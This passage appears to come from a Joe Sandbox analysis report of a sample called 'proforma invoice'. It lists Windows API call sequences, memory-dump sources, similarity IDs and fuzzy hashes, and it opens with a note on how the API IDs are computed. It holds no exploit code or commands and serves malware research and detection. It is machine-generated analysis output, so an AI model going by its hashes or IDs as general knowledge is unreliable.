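Recomputing the API ID from the parsed names reproduces "Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith" for the block above and "ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect" for the socket block, which is the check that the parser picked up every line, including the indented subcall entries and the argument-less "WSAGetLastError.WSOCK32 ref:" form. Because the ID depends only on call names, two reports whose functions share it can be compared by exact string match; the mangled C++ runtime names (the "__ehfuncinfo$??2@..." entries) do not follow the same tokenisation and are out of scope here.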
                  APIs
                  • GetLastError.KERNEL32(?,?,00AC3379,00AC2FE5), ref: 00AC3390
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC339E
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC33B7
                  • SetLastError.KERNEL32(00000000,?,00AC3379,00AC2FE5), ref: 00AC3409
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                  • Instruction ID: 49c33c85c99fa684014fa417ef24a98491c63c9acd110520660b7265e60143fc
                  • Opcode Fuzzy Hash: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                  • Instruction Fuzzy Hash: EA01D83360D351BEAF152BB47D95F6B2E94EB15379732822DF410862F0EF554D016688
                  APIs
                  • GetLastError.KERNEL32(?,?,00AD5686,00AE3CD6,?,00000000,?,00AD5B6A,?,?,?,?,?,00ACE6D1,?,00B68A48), ref: 00AD2D78
                  • _free.LIBCMT ref: 00AD2DAB
                  • _free.LIBCMT ref: 00AD2DD3
                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DE0
                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DEC
                  • _abort.LIBCMT ref: 00AD2DF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 89de516f4a4b50e9013150017207bb8952154e2279bedce949c68b11d4629934
                  • Instruction ID: c54e91e07d85fd802926f749a39a06047081a0f2575a4e33a27810297ed91b6b
                  • Opcode Fuzzy Hash: 89de516f4a4b50e9013150017207bb8952154e2279bedce949c68b11d4629934
                  • Instruction Fuzzy Hash: F1F0A93654460067D71227746D0AB5E39666BF27A1F344417F8A7A33D1EE748901D361
                  APIs
                    • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                    • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B38A4E
                  • LineTo.GDI32(?,00000003,00000000), ref: 00B38A62
                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B38A70
                  • LineTo.GDI32(?,00000000,00000003), ref: 00B38A80
                  • EndPath.GDI32(?), ref: 00B38A90
                  • StrokePath.GDI32(?), ref: 00B38AA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                  • String ID:
                  • API String ID: 43455801-0
                  • Opcode ID: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                  • Instruction ID: 873cf03a549bc195a67fb5b3990a747f52bab3bc1ce7848e2f242fa68114fcdd
                  • Opcode Fuzzy Hash: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                  • Instruction Fuzzy Hash: 41111B7600014CFFDF129F98DC88EAA7FACEB08350F108052BA19AA1A1CB719D55DFA0
                  APIs
                  • GetDC.USER32(00000000), ref: 00B05218
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B05229
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B05230
                  • ReleaseDC.USER32(00000000,00000000), ref: 00B05238
                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B0524F
                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B05261
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                  • Instruction ID: 72f6894503cdf0bfd378e1383b8ca2a9914143ea7a4ad117161c6d38e59f0b33
                  • Opcode Fuzzy Hash: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                  • Instruction Fuzzy Hash: 0E014F75A00718BBEB109BE59C49A5EBFB8EF48751F144065FA04F7291DA709800CFA0
                  APIs
                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Virtual
                  • String ID:
                  • API String ID: 4278518827-0
                  • Opcode ID: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                  • Instruction ID: 01b7055dd971590273a8bee69076f1ac98db2d6d4a9f8f5b7555e5f0cdd218b0
                  • Opcode Fuzzy Hash: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                  • Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0EB30
                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0EB46
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00B0EB55
                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB64
                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB6E
                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB75
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                  • String ID:
                  • API String ID: 839392675-0
                  • Opcode ID: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                  • Instruction ID: bc247652eecefb6e0e75e4552daf319cb62300950205f90a5d83f8595c85f31f
                  • Opcode Fuzzy Hash: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                  • Instruction Fuzzy Hash: B7F01772240558BBE7215BA29C0EEAF3E7CEBCAB11F104158F611F20919BA05A0197B5
                  APIs
                  • GetClientRect.USER32(?), ref: 00AF7452
                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00AF7469
                  • GetWindowDC.USER32(?), ref: 00AF7475
                  • GetPixel.GDI32(00000000,?,?), ref: 00AF7484
                  • ReleaseDC.USER32(?,00000000), ref: 00AF7496
                  • GetSysColor.USER32(00000005), ref: 00AF74B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                  • String ID:
                  • API String ID: 272304278-0
                  • Opcode ID: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                  • Instruction ID: 99106892b2df201128ecc39567570ee64cb0d2f2a1f5a0725c84a6f8ccc0238b
                  • Opcode Fuzzy Hash: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                  • Instruction Fuzzy Hash: 88012831400619EFEB515FA8DC0ABAE7FB5FB04312F610164FA15A31A1CF311E51AB50
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B0187F
                  • UnloadUserProfile.USERENV(?,?), ref: 00B0188B
                  • CloseHandle.KERNEL32(?), ref: 00B01894
                  • CloseHandle.KERNEL32(?), ref: 00B0189C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B018A5
                  • HeapFree.KERNEL32(00000000), ref: 00B018AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                  • String ID:
                  • API String ID: 146765662-0
                  • Opcode ID: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                  • Instruction ID: 1c1a78e2f8e0e4f9274b4f074b83ee7d3b92c2728edcc05a29163456f2b6e241
                  • Opcode Fuzzy Hash: a4d43d665ceef6dc321de0ac2c5324937a76a4edca06a3db73139accc879c4f8
                  • Instruction Fuzzy Hash: D4E0C236004501BBDB015BE1ED0C90ABF29FB49B22B208220F225A2070CF329430EB50
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C6EE
                  • _wcslen.LIBCMT ref: 00B0C735
                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0C79C
                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0C7CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ItemMenu$Info_wcslen$Default
                  • String ID: 0
                  • API String ID: 1227352736-4108050209
                  • Opcode ID: f81d5aea98c061a0175a526d381a24c0918966433b668e7b2aae1b5f8cc42812
                  • Instruction ID: 2aa2e8bfed0fe14239a31c9c54fe4a1fb840b63ab2c9ba89557199a189c96963
                  • Opcode Fuzzy Hash: f81d5aea98c061a0175a526d381a24c0918966433b668e7b2aae1b5f8cc42812
                  • Instruction Fuzzy Hash: 5251BD716043009BD7259F28C985B6A7FE8EB49310F044BADF9A5E31E1DB60DD048B66
                  APIs
                  • ShellExecuteExW.SHELL32(0000003C), ref: 00B2AEA3
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                  • GetProcessId.KERNEL32(00000000), ref: 00B2AF38
                  • CloseHandle.KERNEL32(00000000), ref: 00B2AF67
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseExecuteHandleProcessShell_wcslen
                  • String ID: <$@
                  • API String ID: 146682121-1426351568
                  • Opcode ID: 2b7ab0398e0b175fc24157688c4970f36ea11b58dfd75181819291bfd30213fa
                  • Instruction ID: a824c268e10c2daea0a5f63f8407f84a15e6813815646ee6a534b90f76acd56e
                  • Opcode Fuzzy Hash: 2b7ab0398e0b175fc24157688c4970f36ea11b58dfd75181819291bfd30213fa
                  • Instruction Fuzzy Hash: 75718B71A00625DFCB14EF54D584A9EBBF0FF09310F158499E81AAB392CB74ED45CB91
                  APIs
                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B07206
                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B0723C
                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B0724D
                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B072CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$AddressCreateInstanceProc
                  • String ID: DllGetClassObject
                  • API String ID: 753597075-1075368562
                  • Opcode ID: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                  • Instruction ID: 2568dca1bdbd48fb0aaf6c728c3350373ccb359885f0d1223a0e2f45551581d0
                  • Opcode Fuzzy Hash: 12410d4963a71c42a10fd6dc1108f934139b61227331bc896b3434341b5dee7a
                  • Instruction Fuzzy Hash: 42416071A44204AFDB15CF54C884A9ABFE9EF45350F2580EDBD059F24ADBB0ED44DBA0
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B33E35
                  • IsMenu.USER32(?), ref: 00B33E4A
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B33E92
                  • DrawMenuBar.USER32 ref: 00B33EA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Item$DrawInfoInsert
                  • String ID: 0
                  • API String ID: 3076010158-4108050209
                  • Opcode ID: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                  • Instruction ID: d387dcb0c1aab7659aec8168301d712567ca7e3a5e61fffab4a08274eb1d3fb7
                  • Opcode Fuzzy Hash: cfa02a16076cb1beef0acf9fb8d2367a59fb1c1024c60750409185fd66f5a821
                  • Instruction Fuzzy Hash: 77414875A00219EFDB10DF94D884EAABBF9FF49750F2441A9E905AB250DB30AE45CF60
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B01E66
                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B01E79
                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B01EA9
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$_wcslen$ClassName
                  • String ID: ComboBox$ListBox
                  • API String ID: 2081771294-1403004172
                  • Opcode ID: 10ca2bf8bd27e579b7b954d4ab830165cab97e7a77ee3e4ecd07dfbc988e86f1
                  • Instruction ID: 03a4e41b4d4a0cd43d231a07d502955cede380c11378e22f7ce26e4fd66b1539
                  • Opcode Fuzzy Hash: 10ca2bf8bd27e579b7b954d4ab830165cab97e7a77ee3e4ecd07dfbc988e86f1
                  • Instruction Fuzzy Hash: A421B771A00104BFDB189BA4DD46CFFBBF9EF46354F144559F815A71E1DB3849069620
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                  • API String ID: 176396367-4004644295
                  • Opcode ID: 123ef3a6e58e85b138dd43eeb825f20e0e296396dae9d886615cd498675b92c1
                  • Instruction ID: 2e8ffe8273a1124890c88f74d769f5c08d912c1240539a15d71df73e966cd805
                  • Opcode Fuzzy Hash: 123ef3a6e58e85b138dd43eeb825f20e0e296396dae9d886615cd498675b92c1
                  • Instruction Fuzzy Hash: 9E313633A001794BCB20DF2CE9405BF3BD1DBA3784B0540A9E85DAB24DEA71CE4097E0
                  APIs
                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B32F8D
                  • LoadLibraryW.KERNEL32(?), ref: 00B32F94
                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B32FA9
                  • DestroyWindow.USER32(?), ref: 00B32FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyLibraryLoadWindow
                  • String ID: SysAnimate32
                  • API String ID: 3529120543-1011021900
                  • Opcode ID: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                  • Instruction ID: 591929f70b62befe8ebbc598f65501c2a19042f93c8fe69a01b0efb0dcd453d2
                  • Opcode Fuzzy Hash: e4b9b8b92a29ba704b460f81347ec51939bc7a6f2a7f56fb4014fa0328ae9199
                  • Instruction Fuzzy Hash: 62218C72204205ABEB104FA4DC81EBB77FDEB59364F204658FA50E72A0DB71DC919760
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002), ref: 00AC4D8D
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC4DA0
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AC4D1E,00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000), ref: 00AC4DC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                  • Instruction ID: b696c9dd974dcce193b93b9a819d7a072a1b5bfa7b0e35340d2f714607be7842
                  • Opcode Fuzzy Hash: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                  • Instruction Fuzzy Hash: 52F03C35A40208BBDB11AB90DC49FAEBFE5EF48751F1101A8E90AB2260CF745E40DB95
                  APIs
                  • LoadLibraryA.KERNEL32 ref: 00AFD3AD
                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFD3BF
                  • FreeLibrary.KERNEL32(00000000), ref: 00AFD3E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
